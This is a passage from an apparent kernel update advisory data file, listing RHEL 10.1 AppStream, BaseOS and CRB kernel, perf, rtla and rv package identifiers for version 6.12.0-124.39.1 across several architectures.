"AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-zfcpdump-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.src",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.39.1.el10_1.noarch",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-doc-0:6.12.0-124.39.1.el10_1.noarch",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-zfcpdump-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.src",
"CRB-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.39.1.el10_1.noarch",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
